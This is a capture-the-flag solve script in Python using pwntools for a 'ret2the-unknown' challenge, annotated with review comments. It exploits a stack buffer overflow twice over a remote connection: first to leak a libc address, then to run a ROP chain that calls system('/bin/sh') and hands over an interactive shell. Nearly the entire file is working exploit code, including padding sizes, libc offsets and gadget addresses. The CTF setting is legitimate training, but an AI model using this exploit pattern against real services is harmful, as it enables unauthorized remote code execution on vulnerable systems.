#!/usr/bin/env python3
# CTF solve script (ret2libc) for the "ret2the-unknown" challenge.
# Two payloads are sent: the first returns into main() so the program runs a
# second time and the libc pointer it prints can be read back; the second
# uses offsets from that leak to build a short ROP chain.
from pwn import *
from pwnlib.util.packing import p64  # NOTE(review): redundant, `from pwn import *` already provides p64
context.log_level = logging.DEBUG  # pwntools dumps every byte sent/received at DEBUG
target = remote('mc.ax', 31568)  # live challenge service; swap for the next line to run locally
# target = process("./ret2the-unknown")
pMainPLT = 0x401186 # main() PLT addr
# NOTE(review): main() is not an imported symbol, so it has no PLT stub; this
# looks like main's address in the (presumably non-PIE) binary — confirm against the ELF.
# libc base addr leak
payload = b"A"*(32+8)  # padding up to the saved return address; 32-byte buffer + 8 bytes, presumably saved rbp — TODO confirm
payload += p64(pMainPLT) # Re-exec main
target.sendline(payload)
data = target.recvuntil("good luck!")  # NOTE(review): recent pwntools warns on a str here; b"good luck!" avoids the implicit encode
data = data.split(b"\n")
data = [l for l in data if b"get there:" in l]
# Fragile: data[0] raises IndexError if no line matched (e.g. the banner text changed).
# "0x" is prepended before parsing as base 16, so the printed value must not already carry the prefix.
leaked_addr = int(b"0x" + data[0].split()[-1],16)
print(f"[+] Leaked: {hex(leaked_addr)}")
pPrintf = leaked_addr  # the leaked value is treated as printf's address inside libc
# Local
# pPopRDI = 0x4012a3 # pop rdi; ret;
# pBinSh = pPrintf + 0x133462 # 0x7ffff7f78152 "/bin/sh"
# pSystem = pPrintf - 0xdea0 # 0x7ffff7e36e50 system()
# pExit = (pPrintf - 0x56cf0) + 0x3e660
# Remote
# The four offsets below are tied to one specific libc build (the one the remote
# service runs); the commented "Local" set above was measured against a different libc,
# so the script silently computes wrong addresses if the target's libc changes.
pLibcBase = pPrintf - 0x58560  # printf's offset within that libc
pPopRDI = 0x4012a3  # gadget lives in the binary itself (same value as the local set)
pBinSh = pLibcBase + 0x181519  # "/bin/sh" string in libc
pSystem = pLibcBase + 0x449c0  # system()
pExit = pLibcBase + 0x39ea0  # exit(), presumably so the process ends cleanly after system() returns
# Second overflow: same padding, then the chain pop rdi; ret -> rdi = "/bin/sh" -> system() -> exit()
payload = b"A"*(32+8)
payload += p64(pPopRDI)
payload += p64(pBinSh)
payload += p64(pSystem)
payload += p64(pExit)
target.sendline(payload)
target.interactive()  # hand the connection over to the terminal
# flag{rob-is-proud-of-me-for-exploring-the-unknown-but-i-still-cant-afford-housing}